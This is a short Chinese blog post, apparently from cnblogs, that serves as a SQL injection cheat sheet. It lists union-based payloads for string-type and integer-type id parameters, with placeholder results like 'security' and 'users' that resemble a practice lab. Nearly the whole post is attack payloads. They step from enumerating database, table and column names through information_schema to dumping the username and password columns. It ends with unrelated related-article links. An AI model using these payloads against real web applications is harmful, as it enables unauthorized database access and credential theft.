• sql注入


    一 、字符型(需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=' union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA where '1'='1
    
    ?id=' union select 1,2,database()-- 随便     --后面有个空格再随便输个字母
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库
    【2】查security库的表名

    ?id=' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=' union select 1,group_concat(username),group_concat(password) from security.users--+
    

    二、整型(不需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=0 union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA
    
    ?id=0 union select 1,2,database()
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库

    【2】查security库的表名

    ?id=0 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=0 union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=0 union select 1,group_concat(username),group_concat(password) from security.users
    

    持续更新。。。。。。。。。。

  • 相关阅读:
    PCB CE工具取Genesis JOB与STEP内存地址 方法分享
    PCB 720全景图嵌入登入界面应用实现
    PCB 录屏工具Screen2Exe GifCam ScreenToGif
    Centos部署hexo
    npm俩种换源方式
    腾讯云Centos下安装FastDFS
    远程连接docker容器里的MySQL出现2058
    CentOS7.6安装docker
    数据结构与算法(3)---链表
    java实现自定义图
  • 原文地址:https://www.cnblogs.com/WTa0/p/11810830.html
Copyright © 2020-2023  润新知